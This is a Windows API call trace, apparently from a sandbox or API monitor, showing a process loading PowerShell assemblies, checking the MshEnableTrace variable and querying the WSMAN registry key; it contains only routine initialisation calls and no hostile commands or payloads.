	[0185.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.176] CoCreateGuid (in: pguid=0x27d1d0 | out: pguid=0x27d1d0*(Data1=0x8a6976ef, Data2=0x21a5, Data3=0x43fd, Data4=([0]=0xb8, [1]=0xe8, [2]=0x6a, [3]=0x2c, [4]=0x1d, [5]=0x56, [6]=0x31, [7]=0x14))) returned 0x0
	[0185.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.176] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.179] VirtualQuery (in: lpAddress=0x27b1e0, lpBuffer=0x27c0a0, dwLength=0x30 | out: lpBuffer=0x27c0a0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0185.180] VirtualQuery (in: lpAddress=0x27b270, lpBuffer=0x27c130, dwLength=0x30 | out: lpBuffer=0x27c130*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0185.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.181] VirtualQuery (in: lpAddress=0x27b9f0, lpBuffer=0x27c8b0, dwLength=0x30 | out: lpBuffer=0x27c8b0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0185.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.182] VirtualQuery (in: lpAddress=0x27b9f0, lpBuffer=0x27c8b0, dwLength=0x30 | out: lpBuffer=0x27c8b0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0185.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0185.183] VirtualQuery (in: lpAddress=0x27b9f0, lpBuffer=0x27c8b0, dwLength=0x30 | out: lpBuffer=0x27c8b0*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0187.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x27cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0187.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x27cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0187.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0187.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0187.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x27cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0187.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x27cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0188.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0188.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0188.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x27cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0188.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x27cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0189.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x27cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0189.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x27cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0197.471] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0197.471] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0197.471] CoTaskMemFree (pv=0x190070) 
	[0197.473] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0197.473] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0197.473] CoTaskMemFree (pv=0x190070) 
	[0197.474] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0197.474] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0197.474] CoTaskMemFree (pv=0x190070) 
	[0197.475] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0197.475] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0197.475] CoTaskMemFree (pv=0x190070) 
	[0197.485] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0197.485] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0197.485] CoTaskMemFree (pv=0x190070) 
	[0197.490] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0197.490] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0197.490] CoTaskMemFree (pv=0x190070) 
	[0197.492] CoTaskMemAlloc (cb=0x104) returned 0x190070
	[0197.492] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190070, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0197.492] CoTaskMemFree (pv=0x190070) 
	[0197.505] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d1b8 | out: phkResult=0x27d1b8*=0x2e4) returned 0x0
	[0197.510] RegQueryInfoKeyW (in: hKey=0x2e4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x27d0bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x27d0b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x27d0bc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x27d0b8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0197.510] CoTaskMemFree (pv=0x0) 
	[0197.511] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0197.511] RegEnumValueW (in: hKey=0x2e4, dwIndex=0x0, lpValueName=0xe5880, lpcchValueName=0x27d168, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x27d168, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0197.511] CoTaskMemFree (pv=0xe5880) 
	[0197.511] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0197.511] RegEnumValueW (in: hKey=0x2e4, dwIndex=0x1, lpValueName=0xe5880, lpcchValueName=0x27d168, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x27d168, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0197.511] CoTaskMemFree (pv=0xe5880) 
	[0197.511] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0197.511] RegEnumValueW (in: hKey=0x2e4, dwIndex=0x2, lpValueName=0xe5880, lpcchValueName=0x27d168, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x27d168, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0197.511] CoTaskMemFree (pv=0xe5880) 
	[0197.512] RegQueryValueExW (in: hKey=0x2e4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x27d14c, lpData=0x0, lpcbData=0x27d148*=0x0 | out: lpType=0x27d14c*=0x1, lpData=0x0, lpcbData=0x27d148*=0x8) returned 0x0
	[0197.512] CoTaskMemAlloc (cb=0xc) returned 0x1b8533d0
	[0197.512] RegQueryValueExW (in: hKey=0x2e4, lpValueName="StackVersion", lpReserved=0x0, lpType=0x27d11c, lpData=0x1b8533d0, lpcbData=0x27d118*=0x8 | out: lpType=0x27d11c*=0x1, lpData="2.0", lpcbData=0x27d118*=0x8) returned 0x0
	[0197.512] CoTaskMemFree (pv=0x1b8533d0) 
	[0203.591] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d108 | out: phkResult=0x27d108*=0x1d0) returned 0x0
	[0203.591] RegQueryInfoKeyW (in: hKey=0x1d0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x27d00c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x27d008, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x27d00c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x27d008*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0203.591] CoTaskMemFree (pv=0x0) 
	[0203.591] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0203.591] RegEnumValueW (in: hKey=0x1d0, dwIndex=0x0, lpValueName=0xe5880, lpcchValueName=0x27d0b8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x27d0b8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0203.591] CoTaskMemFree (pv=0xe5880) 
	[0203.591] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0203.591] RegEnumValueW (in: hKey=0x1d0, dwIndex=0x1, lpValueName=0xe5880, lpcchValueName=0x27d0b8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x27d0b8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0203.591] CoTaskMemFree (pv=0xe5880) 
	[0203.591] CoTaskMemAlloc (cb=0x204) returned 0xe5880
	[0203.591] RegEnumValueW (in: hKey=0x1d0, dwIndex=0x2, lpValueName=0xe5880, lpcchValueName=0x27d0b8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x27d0b8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0203.591] CoTaskMemFree (pv=0xe5880) 
	[0203.591] RegQueryValueExW (in: hKey=0x1d0, lpValueName="StackVersion", lpReserved=0x0, lpType=0x27d09c, lpData=0x0, lpcbData=0x27d098*=0x0 | out: lpType=0x27d09c*=0x1, lpData=0x0, lpcbData=0x27d098*=0x8) returned 0x0
	[0203.591] CoTaskMemAlloc (cb=0xc) returned 0x1b853650
	[0203.591] RegQueryValueExW (in: hKey=0x1d0, lpValueName="StackVersion", lpReserved=0x0, lpType=0x27d06c, lpData=0x1b853650, lpcbData=0x27d068*=0x8 | out: lpType=0x27d06c*=0x1, lpData="2.0", lpcbData=0x27d068*=0x8) returned 0x0
